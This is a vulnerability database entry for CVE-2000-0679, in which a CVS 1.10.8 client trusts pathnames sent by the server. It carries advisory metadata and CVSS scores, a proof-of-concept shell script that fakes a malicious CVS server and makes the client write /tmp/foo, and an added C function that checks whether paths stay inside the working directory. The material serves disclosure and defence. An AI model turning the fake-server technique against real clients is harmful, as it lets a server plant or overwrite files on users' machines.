CVE-2000-0679
CVSS 2.1
Published: 2000-10-20 00:00:00
Revised: 2008-09-05 16:21:37

[Original] The CVS 1.10.8 client trusts pathnames that are provided by the CVS server, which allows the server to force the client to create arbitrary files.


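[CNNVD] CVS client arbitrary file creation vulnerability (CNNVD-200010-077)

        The CVS 1.10.8 client trusts pathnames provided by the CVS server. The server can force the client to create arbitrary files.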

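- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links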

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0679
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0679
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-077
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26msg%3Dhvou2daoebb.fsf%40serein.m17n.org
(VENDOR_ADVISORY)  BUGTRAQ  20000728 cvs security problem
http://www.securityfocus.com/bid/1523
(VENDOR_ADVISORY)  BID  1523

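- Vulnerability information

CVS client arbitrary file creation vulnerability
Low risk  Unknown
2000-10-20 00:00:00 2005-05-02 00:00:00
Local
        The CVS 1.10.8 client trusts pathnames provided by the CVS server. The server can force the client to create arbitrary files.

- Advisories and patches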

        

- Vulnerability information (20107)

CVS Kit CVS Server 1.10.8 Instructed File Create Vulnerability (EDBID:20107)
unix local
2000-07-28 Verified
0 Tanaka Akira
source: http://www.securityfocus.com/bid/1523/info

The cvs client blindly trusts paths returned to it by the server. Therefore, a cvs client could be tricked into creating a file anywhere on the system by a malicious server.

This problem can be tested yourself as follows. Although this example
runs a faked cvs server using the :ext: method, this vulnerability is
available with any method (including :pserver: of course).

% ls -l /tmp/foo
ls: /tmp/foo: No such file or directory
% cat crackers-cvs-server
#!/bin/sh

cat <<'End'
Valid-requests Root Valid-responses valid-requests Repository Directory Max-dotdot Static-directory Sticky Checkin-prog Update-prog
Entry Kopt Checkin-time Modified Is-modified UseUnchanged Unchanged Notify Questionable Case Argument Argumentx Global_option
Gzip-stream wrapper-sendme-rcsOptions Set Kerberos-encrypt expand-modules ci co update diff log add remove update-patches
gzip-file-contents status rdiff tag rtag import admin export history release watch-on watch-off watch-add watch-remove watchers
editors init annotate noop
ok
Module-expansion tst
ok
Clear-sticky tst/
/cvsroot/tst/
Clear-static-directory tst/
/cvsroot/tst/
E cvs server: Updating tst
Created /tmp/
/cvsroot/tst/foo
/foo/1.1///
u=rw,g=rw,o=rw
4
abc
ok
End
% CVS_RSH=./crackers-cvs-server cvs -f -d :ext:user@server:/cvsroot co tst
cvs server: Updating tst
cvs checkout: in directory /tmp:
cvs checkout: cannot open CVS/Entries for reading: No such file or directory
cvs checkout: cannot open CVS/Entries.Log: No such file or directory
% ls -l /tmp/foo
-rw-r--r-- 1 akr wheel 4 Jul 19 22:01 /tmp/foo
% cat /tmp/foo
abc 		
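
The missing client-side check, as an added example (not CVS source code and not part of the original advisory): a lexical test that a server-supplied local directory such as the "tst/" and "/tmp/" names in the transcript above stays inside the client's working directory. The function name server_path_is_contained is hypothetical, POSIX "/" separators are assumed, and symlinks would need a separate check.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not a CVS function): return 1 if a server-supplied
 * local directory name stays inside the client's working directory,
 * 0 otherwise. Purely lexical; symlinks need a separate check. */
int server_path_is_contained(const char *path)
{
    int depth = 0;                      /* directory levels below the cwd */
    const char *p = path;

    if (path == NULL || *path == '\0')
        return 0;
    if (*path == '/')                   /* absolute, e.g. "/tmp/" */
        return 0;

    while (*p != '\0') {
        size_t len = strcspn(p, "/");   /* length of this component */

        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0)            /* climbed above the cwd */
                return 0;
        } else if (len > 0 && !(len == 1 && p[0] == '.')) {
            depth++;                    /* ordinary component */
        }                               /* "." leaves depth unchanged */
        p += len;
        while (*p == '/')               /* skip separators, incl. repeats */
            p++;
    }
    return 1;
}

int main(void)
{
    /* "tst/" and "/tmp/" come from the transcript; the rest are constructed. */
    const char *samples[] = { "tst/", "/tmp/", "tst/../../etc/", "./tst/sub/", "../" };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-16s %s\n", samples[i],
               server_path_is_contained(samples[i]) ? "accept" : "reject");
    return 0;
}
```

A client applying a check of this kind to every pathname in a server response, before creating or opening anything, would refuse the "Created /tmp/" response shown above.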

- Vulnerability information

1482
CVS Client Server-Instructed File Create
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-07-28 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
